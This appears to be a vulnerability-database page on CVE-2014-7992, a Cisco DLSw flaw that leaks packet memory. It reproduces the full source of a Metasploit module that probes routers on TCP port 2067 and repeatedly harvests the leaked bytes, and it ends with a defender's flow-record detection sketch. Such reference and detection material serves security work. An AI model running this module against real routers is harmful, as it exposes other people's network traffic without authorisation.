| Reporter | Title | Published | Views |
|---|---|---|---|
| circl | CVE-2014-7992 | 29 May 2018 15:50 | – |
| cisco | Cisco IOS Software DLSw Information Disclosure Vulnerability | 18 Nov 2014 19:13 | – |
| cve | CVE-2014-7992 | 18 Nov 2014 01:00 | – |
| cvelist | CVE-2014-7992 | 18 Nov 2014 01:00 | – |
| metasploit | Cisco DLSw Information Disclosure Scanner | 18 Nov 2014 03:35 | – |
| nvd | CVE-2014-7992 | 18 Nov 2014 01:59 | – |
| prion | Design/Logic Flaw | 18 Nov 2014 01:59 | – |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'socket'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name' => 'Cisco DLSw Information Disclosure Scanner',
      'Description' => %q(
        This module implements the DLSw information disclosure retrieval. There
        is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
        that allows an unauthenticated remote attacker to retrieve the partial
        contents of packets traversing a Cisco router with DLSw configured
        and active.
      ),
      'Author' => [
        'Tate Hansen', # Vulnerability discovery
        'John McLeod', # Vulnerability discovery
        'Kyle Rainey' # Built lab to recreate vulnerability and help test
      ],
      'References' =>
        [
          ['CVE', '2014-7992'],
          ['URL', 'https://github.com/tt5555/dlsw_exploit']
        ],
      'DisclosureDate' => 'Nov 17 2014',
      'License' => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(2067),
        OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024])
      ])
  end

  def get_response(size = 72)
    connect
    response = sock.get_once(size)
    disconnect
    response
  end

  # Called when using check
  def check_host(_ip)
    print_status("Checking for DLSw information disclosure (CVE-2014-7992)")
    response = get_response

    if response.blank?
      vprint_status("No response")
      Exploit::CheckCode::Safe
    elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
      vprint_good("Detected DLSw protocol")
      report_service(
        host: rhost,
        port: rport,
        proto: 'tcp',
        name: 'dlsw'
      )
      # TODO: check that response has something that truly indicates it is vulnerable
      # and not simply that it responded
      unless response[18..72].scan(/\x00/).length == 54
        print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes")
        report_vuln(
          host: rhost,
          port: rport,
          name: name,
          refs: references,
          info: "Module #{fullname} collected #{response.length} bytes"
        )
        Exploit::CheckCode::Vulnerable
      end
    else
      vprint_status("#{response.size}-byte response didn't contain any leaked data")
      Exploit::CheckCode::Safe
    end
  end

  # Main method
  def run_host(ip)
    return unless check_host(ip) == Exploit::CheckCode::Vulnerable

    dlsw_data = ''
    until dlsw_data.length > datastore['LEAK_AMOUNT']
      response = get_response
      dlsw_data << response[18..72] unless response.blank?
    end
    loot_and_report(dlsw_data)
  end

  def loot_and_report(dlsw_leak)
    path = store_loot(
      'dlsw.packet.contents',
      'application/octet-stream',
      rhost,
      dlsw_leak,
      'DLSw_leaked_data',
      'DLSw packet memory leak'
    )
    print_status("DLSw leaked data stored in #{path}")
  end
end
```
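A defender-side sketch, added here and not part of the Metasploit module or the original page: the module's `run_host` loop opens a fresh TCP connection to port 2067 for every read of at most 72 bytes, so collection appears in flow records as a burst of short connections from one source. The flow-record layout, the function names and the window and threshold values are assumptions, and the sample records are constructed.

```ruby
require 'time'

DLSW_PORT = 2067 # default RPORT registered by the module
MAX_READ  = 72   # the module's get_response reads at most 72 bytes per connection

# Constructed sample flow records: time,src,dst,dst_port,bytes_to_client
SAMPLE_FLOWS = (
  (0...20).map { |i| format('2014-11-18T10:00:%02dZ,192.0.2.10,198.51.100.1,2067,72', i) } +
  ['2014-11-18T10:00:05Z,192.0.2.77,198.51.100.1,2067,72',    # one isolated probe
   '2014-11-18T10:00:06Z,192.0.2.50,198.51.100.1,2067,48213', # long-lived DLSw peer session
   '2014-11-18T10:00:07Z,192.0.2.10,198.51.100.1,22,72']      # same source, unrelated port
).freeze

# Parse one record of the assumed CSV layout into a hash.
def parse_flow(line)
  ts, src, dst, port, bytes = line.strip.split(',')
  { time: Time.iso8601(ts), src: src, dst: dst, port: Integer(port), bytes: Integer(bytes) }
end

# Flag source/destination pairs with at least `threshold` short connections
# (1..72 bytes returned) to TCP/2067 inside any `window`-second span.
def dlsw_harvest_suspects(lines, window: 60, threshold: 10)
  short = lines.map { |l| parse_flow(l) }
               .select { |f| f[:port] == DLSW_PORT && f[:bytes].between?(1, MAX_READ) }

  short.group_by { |f| [f[:src], f[:dst]] }.filter_map do |(src, dst), flows|
    times = flows.map { |f| f[:time] }.sort
    best = 0
    lo = 0
    # Sliding window over the sorted timestamps: densest run of connections.
    times.each_with_index do |t, hi|
      lo += 1 while t - times[lo] > window
      best = [best, hi - lo + 1].max
    end
    { src: src, dst: dst, connections: best } if best >= threshold
  end
end

if __FILE__ == $PROGRAM_NAME
  dlsw_harvest_suspects(SAMPLE_FLOWS).each do |hit|
    puts "#{hit[:src]} -> #{hit[:dst]}:#{DLSW_PORT} #{hit[:connections]} short connections"
  end
end
```

A legitimate DLSw peer keeps one long-lived session, so the byte ceiling separates it from repeated short reads; tune `window` and `threshold` to the polling behaviour of any monitoring that touches port 2067.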